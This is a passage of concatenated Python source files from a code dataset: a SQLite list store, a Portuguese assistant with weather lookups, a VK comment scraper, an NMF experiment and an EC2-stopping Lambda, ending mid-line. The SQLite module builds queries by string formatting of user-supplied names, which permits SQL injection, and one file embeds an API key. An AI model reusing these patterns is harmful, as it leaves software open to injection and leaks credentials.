parse_contents(txt):\n\n    name, text, date = None, None, None\n    \n    rest = txt.split('|')\n    \n    if len(rest) == 1:\n        rest = rest[0]\n    else:\n        date = rest[0]\n        rest = rest[1]\n\n    rest = rest.split(':')\n\n    if len(rest) == 1:\n        name = rest[0]\n    else:\n        text = rest[1]\n        name = rest[0]\n\n    #print('name:',name,'text:',text,'date',date)\n\n    return (name, text, date)\n\ndef main():\n    shv_root = os.path.join(os.environ['HOME'], '.config/self-info/')\n\n    if not os.path.exists(shv_root):\n        os.makedirs(shv_root)\n\n    with shelve.open(os.path.join(shv_root, 'shv')) as shv:\n        option, item = parse_args(sys.argv[1:], shv)\n        \n        if option == 'add':\n            name, text, date = parse_contents(item)\n\n            shv[name] = Info(name, text, date)\n        elif option == 'del':\n            print(f'removed item : {shv.pop(item)}')\n        else:\n            [print(shv[i]) for i in shv]\n\nif __name__ == '__main__':\n    main()\n","sub_path":"self-info.py","file_name":"self-info.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"36359978","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3\nfrom typing import Tuple\n\nfrom classis.utils import is_valid_name\n\nDATABASE_PATH = \"db/database.sqlite\"\nMAIN_TABLE_NAME = \"MAIN_LIST\"\n\n\ndef create_connection(db_path=DATABASE_PATH):\n    conn = None\n    try:\n        conn = sqlite3.connect(db_path)\n    except sqlite3.Error as e:\n        print(e)\n    return conn\n\n\ndef database_cursor(func):\n    
def wrapper(*args, **kwargs):\n conn = create_connection()\n if conn is None:\n return\n cursor = conn.cursor()\n res = func(cursor, *args, **kwargs)\n\n conn.commit()\n cursor.close()\n conn.close()\n return res\n return wrapper\n\n\n@database_cursor\ndef init_database(cursor: sqlite3.Cursor):\n cursor.execute(\"\"\"\n create table if not exists {table_name} (\n ID INTEGER PRIMARY KEY AUTOINCREMENT, \n PARENT_ID INTEGER NOT NULL ,\n NAME CHAR(100) NOT NULL, \n THIS_LIST boolean NOT NULL\n );\"\"\".format(table_name=MAIN_TABLE_NAME))\n\n\n@database_cursor\ndef add_element(cursor: sqlite3.Cursor, name: str, this_list: bool, parent_id=0) -> Tuple[int, str]:\n if not is_valid_name(name):\n return 0, \"Invalid name\"\n\n res = cursor.execute(\"SELECT COUNT(*) FROM {table_name} WHERE PARENT_ID = {parent_id} AND NAME = '{name}';\".format(\n table_name=MAIN_TABLE_NAME,\n name=name,\n parent_id=parent_id,\n )).fetchone()[0]\n if res:\n return 0, \"This name already use\"\n\n query = \"\"\"\n INSERT INTO {table_name} (PARENT_ID, NAME, THIS_LIST) \n VALUES ({parent_id}, '{name}', {THIS_LIST});\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n name=name,\n THIS_LIST=int(this_list),\n parent_id=parent_id,\n )\n if not parent_id:\n cursor.execute(query)\n return 1, ''\n\n parent_element = read_element(cursor, parent_id)\n if not parent_element:\n return 0, \"Invalid key 'parent_id'\"\n\n if not parent_element[1]:\n return 0, \"Parent is not list\"\n\n cursor.execute(query)\n return 1, ''\n\n\ndef read_element(cursor: sqlite3.Cursor, element_id: int):\n return cursor.execute(\"\"\"\n SELECT NAME, THIS_LIST, PARENT_ID FROM {table_name}\n WHERE ID == {element_id};\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n element_id=element_id,\n )).fetchone()\n\n\n@database_cursor\ndef read_table(cursor: sqlite3.Cursor, parent_id=0):\n parent_el = read_element(cursor, parent_id)\n if parent_el is None and parent_id != 0:\n return 0, \"Invalid parent_id\"\n data = cursor.execute(\"\"\"\n SELECT ID, NAME, THIS_LIST \n FROM {table_name} where PARENT_ID={parent_id}\n ORDER BY THIS_LIST DESC, name ASC;\n \"\"\".format(\n table_name=MAIN_TABLE_NAME,\n parent_id=parent_id,\n )).fetchall()\n return {\n 'items': [[id_, name, bool(this_list)] for id_, name, this_list in data],\n 'count': len(data),\n }\n\n\ndef is_list_element(cursor: sqlite3.Cursor, element_id: int) -> bool:\n element = read_element(cursor, element_id)\n return element is None or bool(element[1]) or element_id == 0\n\n\n@database_cursor\ndef update_element(cursor: sqlite3.Cursor, element_id: int, name: str, parent_id: int):\n element = read_element(cursor, element_id)\n if not element:\n return 0, \"Invalid element_id\"\n element_name, this_list, element_parent_id = element\n if name is not None and is_valid_name(name):\n element_name = name\n if parent_id is not None:\n if not is_list_element(cursor, parent_id) or parent_id == element_id or (this_list and str(parent_id) in get_lists_in_list(cursor, element_id)):\n return 0, \"Invalid parent_id\"\n element_parent_id = parent_id\n cursor.execute(\"\"\"\n UPDATE {table_name}\n SET NAME = '{new_name}', PARENT_ID = {new_parent_id}\n WHERE ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n new_name=element_name,\n new_parent_id=element_parent_id,\n element_id=element_id,\n ))\n return 1, None\n\n\ndef get_lists_in_list(cursor: sqlite3.Cursor, element_id) -> list:\n parent_ids = [str(element_id)]\n for parent_id in parent_ids:\n res = cursor.execute(\"\"\"\n SELECT ID FROM {table_name}\n WHERE 
THIS_LIST == 1 AND PARENT_ID = {parent_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n parent_id=parent_id,\n )).fetchall()\n if not res:\n break\n parent_ids += [str(a[0]) for a in res]\n return parent_ids\n\n\n@database_cursor\ndef delete_element(cursor: sqlite3.Cursor, element_id: int):\n element = read_element(cursor, element_id)\n if not element:\n return 0, \"Invalid element_id\"\n if not element[1]:\n cursor.execute(\"\"\"\n DELETE FROM {table_name}\n WHERE ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n element_id=element_id,\n ))\n return 1, None\n delete_parents_ids = get_lists_in_list(cursor, element_id)\n\n cursor.execute(\"\"\"\n DELETE FROM {table_name}\n WHERE PARENT_ID IN {delete_ids} OR ID = {element_id}\n ;\"\"\".format(\n table_name=MAIN_TABLE_NAME,\n delete_ids=\"({})\".format(','.join(delete_parents_ids)),\n element_id=element_id,\n ))\n return 1, None\n","sub_path":"classis/utils_db.py","file_name":"utils_db.py","file_ext":"py","file_size_in_byte":5332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"437631403","text":"from django.conf.urls import url\n\n\nfrom .views import assign, lobby, exit_survey, done, instruction\n\nurlpatterns = [\n url(r'^$', assign),\n url(r'^lobby/$', lobby, name='lobby'),\n url(r'^exit/$', exit_survey, name='exit'),\n url(r'^done/$', done, name='done'),\n url(r'^instruction/$', instruction, name='instruction'),\n]\n","sub_path":"game/interactive_static/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"487166421","text":"import requests as rq\r\n\r\n\r\nversion = \"1.5.0\"\r\ncidade = 'joinville'\r\n\r\ndef intro():\r\n\tmsg = \"Assistente - version {} / by: Fulano beltrano ciclano\".format(version)\r\n\tprint(\"-\" * len(msg) + \"\\n{}\\n\".format(msg) + \"-\" * len(msg))\r\n\r\n\r\nlista_erros = [\r\n\t\t\"Não entendi nada\",\r\n\t\t\"Desculpe, não entendi\",\r\n\t\t\"Repita novamente por favor\"\r\n]\r\n\r\nconversas = {\r\n\t\"Olá\": \"oi, tudo bem?\",\r\n\t\"sim e você\": \"Estou bem obrigada por perguntar\",\r\n}\r\n\r\ncomandos = {\r\n\t\"desligar\": \"desligando\",\r\n\t\"reiniciar\": \"reiniciando\"\r\n}\r\n\r\n\r\ndef verifica_nome(user_name):\r\n\tif user_name.startswith(\"Meu nome é\"):\r\n\t\tuser_name = user_name.replace(\"Meu nome é\", \"\")\r\n\tif user_name.startswith(\"Eu me chamo\"):\r\n\t\tuser_name = user_name.replace(\"Eu me chamo\", \"\")\r\n\tif user_name.startswith(\"Eu sou o\"):\r\n\t\tuser_name = user_name.replace(\"Eu sou o\", \"\")\r\n\tif user_name.startswith(\"Eu sou a\"):\r\n\t\tuser_name = user_name.replace(\"Eu sou a\", \"\")\r\n\r\n\treturn user_name \r\n\r\n\r\ndef verifica_nome_exist(nome):\r\n\tdados = open(\"dados/nomes.txt\", \"r\")\r\n\tnome_list = dados.readlines()\r\n\r\n\tif not nome_list:\r\n\t\tvazio = open(\"dados/nomes.txt\", \"r\")\r\n\t\tconteudo = vazio.readlines()\r\n\t\tconteudo.append(\"{}\".format(nome))\r\n\t\tvazio = open(\"dados/nomes.txt\", \"w\")\r\n\t\tvazio.writelines(conteudo)\r\n\t\tvazio.close()\r\n\r\n\t\treturn \"Olá {}, prazer em te conhecer!\".format(nome)\r\n\r\n\tfor linha in nome_list:\r\n\t\tif linha == nome:\r\n\t\t\treturn \"Olá {}, acho que já nos conhecemos\".format(nome)\r\n\r\n\tvazio = open(\"dados/nomes.txt\", \"r\")\r\n\tconteudo = vazio.readlines()\r\n\tconteudo.append(\"\\n{}\".format(nome))\r\n\tvazio = open(\"dados/nomes.txt\", 
\"w\")\r\n\tvazio.writelines(conteudo)\r\n\tvazio.close()\r\n\r\n\treturn \"Oi {} é a primeira vez que nos falamos\".format(nome)\r\n\r\n\r\ndef name_list():\r\n\ttry:\r\n\t\tnomes = open(\"dados/nomes.txt\", \"r\")\r\n\t\tnomes.close()\r\n\r\n\texcept FileNotFoundError:\r\n\t\tnomes = open(\"dados/nomes.txt\", \"w\")\r\n\t\tnomes.close()\r\n\r\n\r\ndef calcula(entrada):\r\n\tif \"mais\" in entrada or \"+\" in entrada:\r\n\t\t# É soma\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = int(entradas_recebidas[1]) + int(entradas_recebidas[3])\r\n\r\n\telif \"menos\" in entrada or \"-\" in entrada:\r\n\t\t# É subtração\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = int(entradas_recebidas[1]) - int(entradas_recebidas[3])\r\n\r\n\telif \"vezes\" in entrada or \"x\" in entrada:\r\n\t\t# É vezes\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = round(float(entradas_recebidas[1]) * float(entradas_recebidas[3]), 2)\r\n\r\n\telif \"dividido\" in entrada or \"/\" in entrada:\r\n\t\t# É divisão\r\n\r\n\t\tentradas_recebidas = entrada.split(\" \")\r\n\t\tresultado = round(float(entradas_recebidas[1]) / float(entradas_recebidas[4]), 2)\r\n\r\n\telse:\r\n\r\n\t\tresultado = \"Operação não encontrada\"\r\n\r\n\r\n\treturn resultado\r\n\r\n\r\n\r\ndef clima_tempo():\t\r\n\tendereco_api = \"http://api.openweathermap.org/data/2.5/weather?appid=9e1280f88eef9db700e867bb898fd3ec&q=\"\r\n\turl = endereco_api + cidade\r\n\r\n\tinfos = rq.get(url).json()\r\n\r\n\r\n\t# Coord\r\n\tlongitude = infos['coord']['lon']\r\n\tlatitude = infos['coord']['lat']\r\n\t# main\r\n\ttemp = infos['main']['temp'] - 273.15 # Kelvin para Celsius\r\n\tpressao_atm = infos['main']['pressure'] / 1013.25 #Libras para ATM\r\n\thumidade = infos['main']['humidity'] # Recebe em porcentagem\r\n\ttemp_max= infos['main']['temp_max'] - 273.15 # Kelvin para Celsius\r\n\ttemp_min = infos['main']['temp_min'] - 273.15 # Kelvin para Celsius\r\n\r\n\t#vento\r\n\tv_speed = infos['wind']['speed'] # km/ h\r\n\tv_direc = infos['wind']['deg'] #Recebe em graus\r\n\r\n\t#clouds / nuvens\r\n\r\n\tnebulosidade = infos['clouds']['all']\r\n\r\n\t#id\r\n\tid_da_cidade = infos['id']\r\n\r\n\t# 11\r\n\treturn [longitude, latitude, \r\n\t\ttemp, pressao_atm, humidade, \r\n\t\ttemp_max, temp_min, v_speed, \r\n\t\tv_direc, nebulosidade, id_da_cidade]\r\n\r\n\r\ndef temperatura():\r\n\ttemp_atual = clima_tempo()[2]\r\n\ttemp_max = clima_tempo()[5]\r\n\ttemp_min = clima_tempo()[6]\r\n\t\r\n\treturn [temp_atual, temp_max, temp_min]","sub_path":"006 - Código vídeo 6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444360617","text":"import urllib.request as ur\r\nimport os\r\nimport shutil\r\nimport json\r\nimport math\r\nfrom datetime import date\r\nimport my_plt\r\n\r\n\r\n\r\ndef get_wall(dictPost2Comment, dictAge, dictCity, owner_id, count, offset):\r\n rowPost = 'https://api.vk.com/method/wall.get?owner_id=%s&count=%s&offset=%s'\r\n req = rowPost % (str(owner_id), str(count), offset) \r\n responseWall = ur.urlopen(ur.Request(req))\r\n wall_js = json.loads(responseWall.read().decode('utf-8'))\r\n\r\n for post in wall_js['response'][1:]:\r\n post_text = post['text'].replace('
',' ')\r\n post_text = post_text.replace(' ',' ')\r\n post_length = len(post_text.split(' '))\r\n \r\n post_id = post['id']\r\n user_id = post['from_id'] \r\n age, city = user_info(user_id)\r\n dictAge.update(collect_dict_age(dictAge, age, 'post_length', post_length))\r\n dictCity.update(collect_dict_city(dictCity, city, 'post_length', post_length))\r\n\r\n # если в посте есть текст, записываем его в файл post-id_user-id.txt \r\n if len(post_text) != 0:\r\n f = open('posts/'+str(post_id)+'_'+ str(user_id) + '.txt', 'w', encoding = 'utf-8')\r\n f.write(post_text)\r\n f.close()\r\n \r\n n_comm = post['comments']['count'] \r\n \r\n for i in range (math.floor(n_comm/100)+1):\r\n offset = 100*i\r\n if n_comm>100:\r\n count = 100\r\n n_comm-=100\r\n else:\r\n count = n_comm\r\n dictAge, dictCity, average_comm_len = get_post_comments(post_id, owner_id, count, dictAge, dictCity)\r\n \r\n \r\n try:\r\n k = dictPost2Comment[post_length]\r\n dictPost2Comment.update({post_length: (k+average_comm_len)/2})\r\n \r\n except KeyError:\r\n dictPost2Comment[post_length]= average_comm_len\r\n\r\n return dictPost2Comment, dictAge, dictCity\r\n\r\n \r\n\r\n \r\ndef get_post_comments(post_id, owner_id, count, dictAge, dictCity):\r\n rowComments = 'https://api.vk.com/method/wall.getComments?post_id=%s&owner_id=%s&count=%s&offset=%s'\r\n reqComments = rowComments % (str(post_id), str(owner_id), str(count), 0 )\r\n responsePost = ur.urlopen(ur.Request(reqComments))\r\n comm_js = json.loads(responsePost.read().decode('utf-8'))\r\n\r\n comment_lengths = []\r\n for comment in comm_js['response'][1:]:\r\n comm_text = comment['text'].replace('
',' ')\r\n comm_text = comm_text.replace(' ',' ')\r\n comm_length = len(comm_text.split(' '))\r\n \r\n comm_id = comment['cid'] \r\n user_id = comment['uid']\r\n age, city = user_info(user_id)\r\n \r\n dictAge.update(collect_dict_age(dictAge, age, 'comment_lengths', comm_length))\r\n dictCity.update(collect_dict_city(dictCity, city, 'comment_lengths', comm_length))\r\n comment_lengths.append(comm_length)\r\n \r\n if len(comm_text)!=0:\r\n f = open('comments/'+str(post_id)+'_'+ str(comm_id) +'_'+str(user_id)+'.txt', 'w', encoding = 'utf-8')\r\n f.write(comm_text)\r\n f.close()\r\n \r\n \r\n if len(comment_lengths)!=0:\r\n average_comm_len = sum(comment_lengths)/len(comment_lengths)\r\n else: average_comm_len = 0\r\n \r\n return dictAge, dictCity, average_comm_len\r\n \r\ndef user_info(user_id):\r\n responseAccount = ur.urlopen(ur.Request('https://api.vk.com/method/users.get?user_ids='+str(user_id)+'&fields=sex,bdate,city,home_town'))\r\n user_info_js = json.loads(responseAccount.read().decode('utf-8'))\r\n \r\n #для записей от имени сообщества\r\n if user_id < 0:\r\n city, age = 0, 0\r\n \r\n else:\r\n try: \r\n city = user_info_js['response'][0]['city']\r\n except KeyError:\r\n city = 0\r\n try: \r\n bdate = user_info_js['response'][0]['bdate'].split('.')\r\n if len(bdate) == 3: #год рождения указан\r\n bdate = date(int(bdate[2]), int(bdate[1]), int(bdate[1])) # year, month, day \r\n today = date.today()\r\n age = today.year - bdate.year - ((today.month, today.day)<(bdate.month, bdate.day))\r\n else:\r\n age = 0 \r\n except KeyError:\r\n age = 0 \r\n return age, city \r\n \r\n \r\n\r\ndef collect_dict_age(dictAge, age, x_length, x_value):\r\n if age!=0:\r\n try:\r\n dictAge[age][x_length].append(x_value)\r\n except KeyError:\r\n try:\r\n dictAge[age].update({x_length : [x_value]})\r\n except KeyError:\r\n dictAge[age]= {x_length : [x_value]}\r\n \r\n return dictAge\r\n\r\n\r\n\r\ndef collect_dict_city(dictCity, city, x_length, x_value):\r\n if city!=0:\r\n try:\r\n dictCity[city][x_length].append(x_value)\r\n except KeyError:\r\n try:\r\n dictCity[city].update({x_length : [x_value]})\r\n except KeyError:\r\n dictCity[city]= {x_length : [x_value]}\r\n\r\n return dictCity\r\n\r\n\r\n\r\ndef main():\r\n #owner_id = -60854067\r\n owner_id = -33374477\r\n n = 115\r\n \r\n dictPost2Comment= {}\r\n dictAge= {}\r\n dictCity = {}\r\n \r\n # папки post и comments\r\n for fold in ['posts', 'comments']:\r\n if fold in os.listdir():\r\n shutil.rmtree(fold)\r\n os.mkdir(fold)\r\n\r\n for i in range (math.floor(n/100)+1):\r\n offset = 100*i\r\n if n>100:\r\n count = 100\r\n n-=100\r\n else:\r\n count = n\r\n get_wall(dictPost2Comment, dictAge, dictCity, owner_id, count, offset)\r\n \r\n\r\n my_plt.Post2Comment_graph(dictPost2Comment) \r\n my_plt.Age_graph(dictAge)\r\n my_plt.City2Comment_graph(dictCity)\r\n my_plt.City2Post_graph(dictCity)\r\n\r\nmain()\r\n","sub_path":"vk-matplotlib/vk_post-comments.py","file_name":"vk_post-comments.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71036820","text":"__author__ = 'Matt L'\n\nimport RPi.GPIO as gpio\nimport time\nimport sys\n\nclass CarDistance:\n\n def __init__(self):\n gpio.setwarnings(False)\n gpio.setmode(gpio.BOARD)\n gpio.setup(12, gpio.OUT)\n gpio.setup(16, gpio.IN)\n self.nosig = None\n self.sig = None\n self.sigtime = None\n\n def objdistance(self):\n\n gpio.output(12, False)\n\n while gpio.input(16) == 0:\n self.nosig = time.time()\n\n while 
gpio.input(16) == 1:\n self.sig = time.time()\n\n self.sigtime = self.sig - self.nosig\n self.distance = self.sigtime/0.000058\n\n return int(self.distance)\n\nif __name__ == '__main__':\n CartDistance = CarDistance()\n print(CartDistance.objdistance())\n gpio.cleanup()\n","sub_path":"DistanceSensor.py","file_name":"DistanceSensor.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"373630106","text":"def parse_entry(entry):\n space_split = entry.split(' ')\n start = space_split[2].strip(':').split(',')\n size = space_split[3].split('x')\n return {'id': space_split[0],\n 'x': int(start[0]),\n 'y': int(start[1]),\n 'length': int(size[0]),\n 'width': int(size[1])}\n\ndef update_sets(entry, point_set, intersection_set, no_conflict):\n new_set = set()\n for i in range(entry['length']):\n for j in range(entry['width']):\n new_set.add((entry['x'] + i, entry['y'] + j))\n intersection = point_set.intersection(new_set)\n if len(intersection) == 0:\n no_conflict.append(entry['id'])\n point_set = point_set.union(new_set)\n intersection_set = intersection_set.union(intersection)\n return (point_set, intersection_set, no_conflict)\n\ndef verify_no_conflict(entry, intersection_set):\n for i in range(entry['length']):\n for j in range(entry['width']):\n if (entry['x'] + i, entry['y'] + j) in intersection_set:\n return False\n return True\n\nwith open('../../input') as _file:\n _input = _file.read()\n entries = _input.split('\\n')\n\npoint_set = set()\nintersection_set = set()\nno_conflict = list()\n\nfor entry in entries:\n if entry == '' or entry is None:\n continue\n parsed_entry = parse_entry(entry)\n point_set, intersection_set, no_conflict = update_sets(parsed_entry, point_set, intersection_set, no_conflict)\n\n\nfor id_str in no_conflict:\n idx = int(id_str[1:]) - 1\n parsed_entry = parse_entry(entries[idx])\n if verify_no_conflict(parsed_entry, intersection_set):\n print(parsed_entry)\n# print(no_conflict)\n","sub_path":"day03/part2/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416636130","text":"#!/usr/bin/env python3\n#\n# Script to extract version information from library.json and print preprocessor\n# flags for PlatformIO to inject them into the code.\n#\n# SPDX-FileCopyrightText: 2021 Junde Yhi \n# SPDX-License-Identifier: MIT\n\nimport json\n\nwith open(\"library.json\", \"r\") as library_json:\n library = json.load(library_json)\n\nhttp_simple_ver = library[\"version\"]\nfor dep in library[\"dependencies\"]:\n if dep[\"name\"] == \"tinywot\":\n tinywot_ver = dep[\"version\"]\n else:\n tinywot_ver = \"0\" # XXX\n\nprint(\"-D TINYWOT_HTTP_SIMPLE_VERSION='\\\"{}\\\"' -D TINYWOT_VERSION='\\\"{}\\\"'\"\n .format(http_simple_ver, tinywot_ver))\n","sub_path":"script/version-build-flags.py","file_name":"version-build-flags.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70054705","text":"import boto3\n\nregions = ['us-east-1','us-east-2','us-west-1','us-west-2']\n\ndef lambda_handler(event, context):\n for region in regions : \n print(\"Region->\",region)\n ec2 = boto3.client('ec2', region_name=region)\n instances = getInstance( ec2 )\n if instances:\n stop(ec2, instances)\n else :\n print(\"Not instances in this region \")\n\ndef start(ec2, instances):\n 
ec2.start_instances(InstanceIds=instances)\n print('started your instances: ' + str(instances))\n\ndef stop (ec2, instances):\n ec2.stop_instances(InstanceIds=instances)\n print('stopped your instances: ' + str(instances))\n\ndef getInstance(ec2):\n instances = []\n \n response = ec2.describe_instances(\n Filters=[\n {\n 'Name': 'tag:estatus',\n 'Values': [\n 'test', 'QA','qa','dev','desarrollo'\n ],\n },\n ]\n \n )\n \n for res in response[\"Reservations\"]:\n for li in res[\"Instances\"]:\n instances.append(li[\"InstanceId\"])\n \n return instances\n","sub_path":"EC2/Start-StopEC2/Off-ec2-function-week.py","file_name":"Off-ec2-function-week.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"654147146","text":"import numpy as np\nfrom scipy.fft import fftn, ifftn, fftshift, fftfreq\nimport streamlit as st\nimport matplotlib.pyplot as plt\nimport subprocess\n\nimage_seed = st.sidebar.slider('Image Seed', 0, 10000, 0)\ntransform_seed = st.sidebar.slider('Transform Seed', 0, 10000, 0)\ntransform_level = st.sidebar.slider('Transform Level', 0.0, 100.0, 0.0)\n\n\ndef random_channel(n, rand, fpower=2.0):\n freq = fftn(rand.rand(n, n))\n\n fx = fftfreq(n)[:, None]\n fy = fftfreq(n)[None, :]\n\n # combine as l2 norm of freq\n f = (fx**2 + fy**2)**0.5\n\n i = f > 0\n freq[i] /= f[i]**fpower\n freq[0, 0] = 0.0\n\n data = np.real(ifftn(freq))\n data -= data.min()\n data /= data.max()\n return data\n\n@st.cache\ndef random_gray(n, seed, fpower=2.0):\n rand = np.random.RandomState(seed)\n return random_channel(n, rand, fpower)\n\n@st.cache\ndef random_color(n, seed):\n rand = np.random.RandomState(seed)\n return np.stack([random_channel(n, rand) for _ in range(3)], 2)\n\n\ndef rotate_image(img, i, j, a):\n c = np.cos(a)\n s = np.sin(a)\n\n img = 2.0*img-1.0\n x, y = img[:, :, i], img[:, :, j]\n img[:, :, i], img[:, :, j] = c * x + s * y, -s * x + c * y\n img -= img.min()\n img /= img.max()\n return img\n\nn = 512\nimg = random_color(n, image_seed)\n\na = random_color(n, transform_seed) * transform_level\nimg = rotate_image(img, 0, 1, a[:, :, 0])\nimg = rotate_image(img, 0, 2, a[:, :, 1])\nimg = rotate_image(img, 1, 2, a[:, :, 2])\n\n'''\n# Output\n\nPlay around with the parameters on the left to change the image.\n'''\n\nst.image(img, width=600)\n\n'''\nThe image is generated as follows:\n\n1. Generate 6D cube of \"brownian noise\". We'll name these coordinates (R, G, B, A1, A2, A3).\n2. Apply a rotation of angle A1*Level to (R, G) plane.\n3. Apply a rotation of angle A2*Level to (R, B) plane.\n4. Apply a rotation of angle A3*Level to (G, B) plane.\n5. The resulting (R, G, B) data is the image.\n\n# Background\n\nI was inspired to write this after seeing some neat examples from the [accidental noise library](http://accidentalnoise.sourceforge.net).\n\nMy approach to doing this was:\n\n1. Generate nice looking 2D noise. I found that a 2D analog of [brownian noise](https://en.wikipedia.org/wiki/Colors_of_noise#Brownian_noise) looked pretty good.\n2. Stack 6 independent channels to form the 6D cube.\n3. Apply the rotations outlined above.\n\nOut of these steps, I found the most interesting bit to be generating the 2D noise.\n\nThere seem to be many approaches for doing this, including classic approaches like [Perlin](https://en.wikipedia.org/wiki/Perlin_noise) and [Simplex](https://en.wikipedia.org/wiki/Simplex_noise) noise. 
Since I had access to good numeric libraries, I ended up going straight to the following FFT based approach.\n\nFirst, we generate a 2D image of uniformly sampled random noise. It pretty much looks like the static on your TV a.k.a. white noise.\n'''\n\nst.image(random_gray(512, 32, 0.0))\n\n'''\nWhite noise looks pretty harsh, so we want to smooth it out to get brownian noise.\n\nTo do this, we take the 2D FFT to get to the frequency domain and then rescale things so they fall off like 1/f^2. To be nitpicky, I only found a general definition of brownian noise in 1D. Still... we're doing something very similar by rescaling by \"one over the Euclidean norm squared\".\n\nFinally, we take the inverse 2D FFT to get our image back.\n'''\n\nst.image(random_gray(512, 32))\n\n'''\nNoice!\n'''\n\nif st.sidebar.button('Save Video'):\n for i, level in enumerate(np.linspace(0, 100.0, 300)):\n img = random_color(n, image_seed)\n a = random_color(n, transform_seed) * level\n img = rotate_image(img, 0, 1, a[:, :, 0])\n img = rotate_image(img, 0, 2, a[:, :, 1])\n img = rotate_image(img, 1, 2, a[:, :, 2])\n plt.imsave(f'frames/{i:03d}.jpg', img)\n\n filename = f'videos/{image_seed}-{transform_seed}.mp4'\n subprocess.check_call(['ffmpeg', '-y', '-framerate', '10', '-i', 'frames/%03d.jpg', filename])\n\nst.sidebar.text('(Requires ffmpeg)')","sub_path":"docs/static/noice.py","file_name":"noice.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205019587","text":"import time\nimport random\nfrom multiprocessing import Process,Semaphore\ndef ktv(person,sem):\n sem.acquire()\n print(\"%s进入了ktv,正在唱歌\"%(person))\n time.sleep(2)\n print(\"%s唱完了,离开了ktv\"%(person))\n sem.release()\n\nif __name__ == \"__main__\":\n sem = Semaphore(3)\n for i in range(10):\n p = Process(target=ktv,args=(\"person%s\"%(i),sem))\n p.start()","sub_path":"web scrapy/exercise/multiprocessing/08_信号量_3.py","file_name":"08_信号量_3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"212066743","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport nmf\n\ndef test1(): \n \"\"\" trouver minimum de nb itérations nécessaire \"\"\"\n # plotter erreur sur données de test et d'apprentissage\n ratings = np.genfromtxt('data/data1/ratings.csv', delimiter=\",\", dtype=(int,int,float,int))\n ratings = ratings[1:]\n data_train,data_test = nmf.split_data(ratings)\n nb_users = 671\n nb_movies = 164979\n z = 3\n eps = 5e-3 #10e-3,5e-3\n epsu = 10e-5\n epsi = 10e-5\n nb_iter = 10000 # nb_iter = 20 000 est suffisant selon le graphe \n nb_norm = 100\n error_threshold = 1\n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n iter_histo,train_error_histo,test_error_histo,Nu,Ni = nmf.SGD_error_included(data_train,data_test,Nu,Ni,nb_iter,nb_norm,eps,epsu,epsi,error_threshold)\n plt.figure()\n plt.plot(iter_histo,test_error_histo)\n plt.show()\n# Nu_embedded = TSNE(n_components=2).fit_transform(Nu)\n# plt.figure()\n# plt.plot(Nu_embedded[:,0],Nu_embedded[:,1], 'b*')\n \ndef test2():\n \"\"\" trouver la meilleure couple de eps et eps_ui \"\"\"\n ratings = np.genfromtxt('data/data1/ratings.csv', delimiter=\",\", dtype=(int,int,float,int))\n ratings = ratings[1:]\n data_train,data_test = nmf.split_data(ratings)\n nb_users = 671\n nb_movies = 164979\n z = 3\n Nu,Ni = nmf.init_matrix(nb_users,nb_movies,z,5,0)\n 
lb = 1e-5\r\n    up = 1e-1\r\n    nb_eps = 2\r\n    eps,eps_ui,error_train,error_test = nmf.optim_eps(data_train,data_test,Nu,Ni,lb,up,nb_eps)\r\n    np.save(\"result/data1/eps.npy\",eps)\r\n    np.save(\"result/data1/error_train.npy\",error_train)\r\n    np.save(\"result/data1/error_test\",error_test)\r\n    error_min = error_test.min()\r\n    print(\"erreur minimale = \", error_min)\r\n    f = plt.figure()\r\n    plt.imshow(error_test,extent=[lb,up,lb,up])\r\n    plt.colorbar()\r\n    plt.title(\"error_test selon eps\")\r\n    plt.xlabel(\"epsilon de SGD\")\r\n    plt.ylabel(\"epsilon utilisateur idem\")\r\n    f.savefig(\"result/data1/erreur_eps.pdf\")\r\n\r\n\r\n\"\"\" nouvelle données avec plus d'information sur les utilisateurs\"\"\"\r\n\"\"\" UserIDs range between 1 and 6040; MovieIDs range between 1 and 3952 \"\"\"\r\ndef test3():\r\n    \"\"\" trouver minimum de nb itérations nécessaire \"\"\"\r\n    \"\"\" 300 000 iter \"\"\"\r\n    ratings = np.load('data/data2/ratings.npy') \r\n    data_train,data_test = nmf.split_data(ratings)\r\n    nb_users = 6040\r\n    nb_movies = 3883\r\n    z = 3\r\n    eps = 5e-3\r\n    epsu = 10e-5\r\n    epsi = 10e-5\r\n    nb_iter = 